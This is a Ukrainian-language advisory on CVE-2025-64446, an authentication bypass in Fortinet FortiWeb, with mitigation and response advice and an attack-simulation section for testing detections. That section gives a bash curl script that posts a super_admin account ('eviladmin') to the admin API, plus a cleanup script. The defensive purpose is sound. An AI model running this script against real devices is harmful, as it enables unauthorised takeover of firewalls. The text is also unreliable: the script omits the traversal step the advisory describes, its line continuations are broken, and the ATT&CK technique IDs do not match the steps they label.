Уразливість обходу автентифікації у Fortinet FortiWeb через уразливість обходу шляху (CVE-2025-64446)

Резюме

Нещодавно виявлена критична уразливість обходу аутентифікації у Fortinet FortiWeb, відома як CVE-2025-64446, дозволяє неавторизованим зловмисникам створювати облікові записи адміністратора шляхом спеціально сформованого запиту обходу каталогів. За даними з відкритих джерел, уразливість активно експлуатувалася з початку жовтня 2025 року та згодом була додана до офіційних каталогів загроз через свою серйозність. Успішна експлуатація надає повний контроль над ураженим WAF-пристроєм і може дозволити зловмисникам проникнути глибше у внутрішні мережі. Раніше дослідження CVE-2025-64446 показує, що спроби експлуатації продовжують націлюватися на FortiWeb прилади, відкриті в інтернеті, в широкому масштабі.

Аналіз CVE-2025-64446

CVE-2025-64446 впливає на кілька версій FortiWeb, дозволяючи зловмисникам відправити спеціально сформований шкідливий HTTP POST запит на кінцеву точку API. Послідовність обходу каталогів дозволяє доступ до адміністративного CGI-скрипту, відповідального за створення користувачів. Це призводить до створення нового адміністративного облікового запису на пристрої, забезпечуючи повний контроль супротивнику. Оскільки пристрої FortiWeb працюють у тісному зв’язку з іншими продуктами Fortinet, ця уразливість призводить до більш широкого впливу на екосистему, тобто успішний злам може дозволити зловмисникам виконувати бічний рух і скомпрометувати додаткові підключені системи та служби. Попередньо спостережувані атаки на FortiWeb (включаючи активність навколо CVE-2025-25257) підвищують ймовірність продовження націлювання.

Пом’якшення

Fortinet випустила патчі для всіх уразливих версій. Негайне пом’якшення CVE-2025-64446 вимагає оновлення до останньої виправленої версії продукту 8.0.2. Рекомендовані заходи пом’якшення включають обмеження доступу до управлінського інтерфейсу лише до довірених IP-адрес або через VPN, забезпечення багатофакторної аутентифікації для адміністративного доступу, ротацію облікових даних для всіх адміністративних облікових записів FortiWeb, моніторинг активності адміністративного API на предмет аномальних подій створення користувачів і видалення доступу управління HTTP/HTTPS із загальнодоступного інтернету. Організаціям слід також дотримуватися внутрішніх процедур тестування патчів, щоб уникнути операційних збоїв.

Реагування

Команди безпеки повинні підтвердити інвентар версій, застосувати патчі без зволікання та відключити зовнішній доступ до управління, якщо негайне оновлення неможливе. Враховуючи спроби активної експлуатації, рекомендується посилити моніторинг на предмет підозрілих POST-запитів, що націлюються на уразливий шлях API. Якщо існуючі облікові записи демонструють неочікувані зміни, слід змінити облікові дані та переглянути журнали аудиту з підвищеною частотою. Збір IOCs CVE-2025-64446, перегляд моделей трафіку та їх кореляція з останньою активністю експлуатації покращить видимість та знизить ризик.

Виконання симуляції

Необхідна умова: Перевірка телеметрії та базового рівня повинна пройти попередній контроль.

Обґрунтування: Цей розділ деталізує точне виконання техніки супротивника (TTP), призначеної для активації правила виявлення. Команди й наратив ПОВИННІ безпосередньо відображати ідентифіковані TTP, спрямовані на генерацію точно очікуваної телеметрії за допомогою логіки виявлення.

• Опис атаки та команди:

  1. Рекогносціювання (T1016.001): Зловмисник виявляє публічну IP адресу пристрою FortiWeb за допомогою відкритого джерела розвідки.
  2. Збір облікових даних/Підвищення привілеїв (T1567.004): Використовуючи вразливість CVE-2025-64446, зловмисник формує шкідливе POST повідомлення, яке створює нового адміністративного користувача з повними правами.
  3. Виконання: Зловмисник надсилає сформований запит через HTTPS, забезпечуючи request_method як POST а request_uri точно відповідає /api/v2.0/cmdb/system/admin.

• Скрипт регресійного тестування:

  #!/usr/bin/env bash
  # Використовуйте CVE-2025-64446 для створення нового адміністративного облікового запису FortiWeb
  # Скоригуйте змінні для необхідного цільового середовища
  
  TARGET="https://fortiweb.example.com"
  ENDPOINT="/api/v2.0/cmdb/system/admin"
  NEW_USER="eviladmin"
  NEW_PASS="P@ssw0rd!2025"
  # Уразлива API не вимагає аутентифікації для цієї кінцевої точки (згідно з CVE)
  PAYLOAD=$(cat <<EOF
  {
      "name": "${NEW_USER}",
      "password": "${NEW_PASS}",
      "privilege": "super_admin"
  }
  EOF
  )
  
  echo "[*] Відправлення шкідливого POST до ${TARGET}${ENDPOINT}"
  curl -k -X POST "${TARGET}${ENDPOINT}" 
       -H "Content-Type: application/json" 
       -d "${PAYLOAD}" 
       -o /dev/null -s -w "HTTP %{http_code}n"
  
  echo "[*] Імітація атаки завершена."

• Команди очищення:

  #!/usr/bin/env bash
  # Видалення шкідливого адміністративного облікового запису, створеного під час тесту
  TARGET="https://fortiweb.example.com"
  ENDPOINT="/api/v2.0/cmdb/system/admin/${NEW_USER}"
  
  echo "[*] Видалення тестового адміністративного облікового запису ${NEW_USER}"
  curl -k -X DELETE "${TARGET}${ENDPOINT}" 
       -H "Content-Type: application/json" 
       -o /dev/null -s -w "HTTP %{http_code}n"
  
  echo "[*] Очистка завершена."